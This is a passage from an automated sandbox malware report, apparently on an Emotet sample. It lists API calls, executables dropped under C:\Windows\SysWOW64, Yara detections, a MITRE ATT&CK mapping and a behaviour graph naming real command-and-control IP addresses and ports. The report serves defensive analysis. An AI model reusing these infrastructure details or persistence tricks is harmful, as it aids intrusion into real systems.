                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00416761 SetUnhandledExceptionFilter,__encode_pointer,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00416783 __decode_pointer,SetUnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_0041BCDF __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00412013 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00416262 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00416761 SetUnhandledExceptionFilter,__encode_pointer,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00416783 __decode_pointer,SetUnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_0041BCDF __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A478B2 SetUnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A4C918 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A473A8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A4771F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeProcess created: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe 'C:\Windows\SysWOW64\DefaultPrinterProvider\\tokenbinding2.exe' YAQAADwAAABEAGUAZgBhAHUAbAB0AFAAcgBpAG4AdABlAHIAUAByAG8AdgBpAGQAZQByAFwASwBCAEQASABFAEIAAAA=
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_0041D073 cpuid
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_004188D6 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A553D2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00424371 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterWindowMessageA,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0000001C.00000002.442107298.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.464467088.0000000002971000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.428286473.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.439198093.00000000030A4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.419691301.0000000002B60000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.447921757.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.409946208.00000000020C4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.468787553.00000000029E4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.470554430.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.493970869.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.446724023.0000000003274000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.482749716.00000000025B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.483313060.0000000002671000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.439928850.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.468454177.0000000002980000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.433437120.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.413932910.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.438746003.0000000001350000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.449294722.0000000001310000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.483058248.0000000002614000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.463773326.00000000028B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.243322939.00000000021E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.409716178.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.429639515.0000000002CD4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.446019093.0000000001850000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.414052123.0000000002F14000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.477958707.00000000031B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.492699981.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.417949677.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.410029176.00000000021D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.429459440.0000000002C70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.465519796.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.464108385.0000000002914000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.243267422.0000000002180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.243296865.00000000021C4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.449645390.0000000002D64000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.442504698.0000000002E94000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.443777034.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.478389759.0000000003214000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.420026339.0000000002BC4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.494214004.0000000002B44000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.412800025.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 32.2.jscript9.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.KBDHEB.exe.5b053f.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.msrd2x40.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.tokenbinding2.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.2.catsrvut.exe.2ae279e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.KBDINTAM.exe.185279e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.MCCSEngineShared.exe.28b279e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.COLORCNV.exe.135052e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.MCCSEngineShared.exe.28b279e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.msvcr100_clr0400.exe.25b279e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.KBDHEB.exe.2b6279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.KBDINTAM.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.tokenbinding2.exe.2eb279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.KBDHEB.exe.2b6052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.msrd2x40.exe.131052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.execmodelproxy.exe.2c7052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.wmvdspa.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.wmvdspa.exe.31b052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.MV9tCJw8Xr.exe.218053f.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.msvcr100_clr0400.exe.2670000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.2.catsrvut.exe.2ae052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.execmodelproxy.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.usp10.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.jscript9.exe.298279e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.wmvdspa.exe.31b279e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.execmodelproxy.exe.2c7052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.MCCSEngineShared.exe.2970000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.KBDHEB.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.jscript9.exe.298052e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.msrd2x40.exe.131279e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.wmvdspa.exe.31b279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.MV9tCJw8Xr.exe.2181f3f.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.KBDHEB.exe.21d0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.COLORCNV.exe.135052e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.usp10.exe.2e3279e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.MV9tCJw8Xr.exe.218053f.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.usp10.exe.2e3279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.COLORCNV.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.KBDINTAM.exe.185279e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.MCCSEngineShared.exe.28b052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.KBDHEB.exe.2b6052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.MV9tCJw8Xr.exe.21e0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.COLORCNV.exe.135279e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.msrd2x40.exe.131279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.msvcr100_clr0400.exe.25b052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.COLORCNV.exe.135279e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.wmvdspa.exe.31b052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.execmodelproxy.exe.2c7279e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.2.catsrvut.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.execmodelproxy.exe.2c7279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.usp10.exe.2e3052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.KBDHEB.exe.5b1f3f.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.KBDHEB.exe.2b6279e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.tokenbinding2.exe.2eb052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.msvcr100_clr0400.exe.25b052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.KBDHEB.exe.20c4000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.KBDHEB.exe.5b053f.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.2.catsrvut.exe.2ae052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.jscript9.exe.298052e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.tokenbinding2.exe.2eb052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.msvcr100_clr0400.exe.25b279e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.jscript9.exe.298279e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.usp10.exe.2e3052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.MV9tCJw8Xr.exe.2181f3f.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.MV9tCJw8Xr.exe.21c4000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.KBDHEB.exe.20c4000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.2.catsrvut.exe.2ae279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.MCCSEngineShared.exe.28b052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.msrd2x40.exe.131052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.tokenbinding2.exe.2eb279e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.KBDINTAM.exe.185052e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.MV9tCJw8Xr.exe.21c4000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.KBDHEB.exe.5b1f3f.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.KBDINTAM.exe.185052e.3.raw.unpack, type: UNPACKEDPE
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A413C0 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1Input Capture2System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1LSASS MemorySystem Service Discovery1Remote Desktop ProtocolInput Capture2Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter2Windows Service12Windows Service12Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsService Execution11Logon Script (Mac)Process Injection11Software Packing1NTDSSystem Information Discovery45Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsSecurity Software Discovery161SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol111Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsVirtualization/Sandbox Evasion3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading12DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion3Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection11/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 356776 Sample: MV9tCJw8Xr Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 61 177.130.51.198 WspServicosdeTelecomunicacoesLtdaBR Brazil 2->61 63 110.37.224.243 WATEEN-IMS-PK-AS-APNationalWiMAXIMSenvironmentPK Pakistan 2->63 65 92 other IPs or domains 2->65 89 Found malware configuration 2->89 91 Antivirus / Scanner detection for submitted sample 2->91 93 Multi AV Scanner detection for submitted file 2->93 95 2 other signatures 2->95 15 MV9tCJw8Xr.exe 2 2->15         started        18 svchost.exe 2->18         started        20 svchost.exe 9 1 2->20         started        23 8 other processes 2->23 signatures3 process4 dnsIp5 119 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->119 25 KBDHEB.exe 13 15->25         started        121 Changes security center settings (notifications, updates, antivirus, firewall) 18->121 30 MpCmdRun.exe 1 18->30         started        67 127.0.0.1 unknown unknown 20->67 signatures6 process7 dnsIp8 71 190.144.18.198, 80 TelmexColombiaSACO Colombia 25->71 73 87.106.136.232, 49742, 8080 ONEANDONE-ASBrauerstrasse48DE Germany 25->73 75 2 other IPs or domains 25->75 59 C:\Windows\SysWOW64\...\tokenbinding2.exe, PE32 25->59 dropped 113 Drops executables to the windows directory (C:\Windows) and starts them 25->113 32 tokenbinding2.exe 5 25->32         started        35 conhost.exe 30->35         started        file9 signatures10 process11 signatures12 77 Multi AV Scanner detection for dropped file 32->77 79 Machine Learning detection for dropped file 32->79 81 Drops executables to the windows directory (C:\Windows) and starts them 32->81 83 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->83 37 KBDHEB.exe 2 32->37         started        process13 dnsIp14 69 192.168.2.1 unknown unknown 37->69 101 Drops executables to the windows directory (C:\Windows) and starts them 37->101 103 Hides that the sample has been downloaded from the Internet (zone.identifier) 37->103 41 execmodelproxy.exe 2 37->41         started        signatures15 process16 signatures17 109 Drops executables to the windows directory (C:\Windows) and starts them 41->109 111 Hides that the sample has been downloaded from the Internet (zone.identifier) 41->111 44 COLORCNV.exe 2 41->44         started        process18 signatures19 115 Drops executables to the windows directory (C:\Windows) and starts them 44->115 117 Hides that the sample has been downloaded from the Internet (zone.identifier) 44->117 47 usp10.exe 44->47         started        process20 signatures21 123 Drops executables to the windows directory (C:\Windows) and starts them 47->123 125 Hides that the sample has been downloaded from the Internet (zone.identifier) 47->125 50 KBDINTAM.exe 47->50         started        process22 signatures23 85 Drops executables to the windows directory (C:\Windows) and starts them 50->85 87 Hides that the sample has been downloaded from the Internet (zone.identifier) 50->87 53 msrd2x40.exe 50->53         started        process24 signatures25 97 Drops executables to the windows directory (C:\Windows) and starts them 53->97 99 Hides that the sample has been downloaded from the Internet (zone.identifier) 53->99 56 MCCSEngineShared.exe 53->56         started        process26 signatures27 105 Drops executables to the windows directory (C:\Windows) and starts them 56->105 107 Hides that the sample has been downloaded from the Internet (zone.identifier) 56->107

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

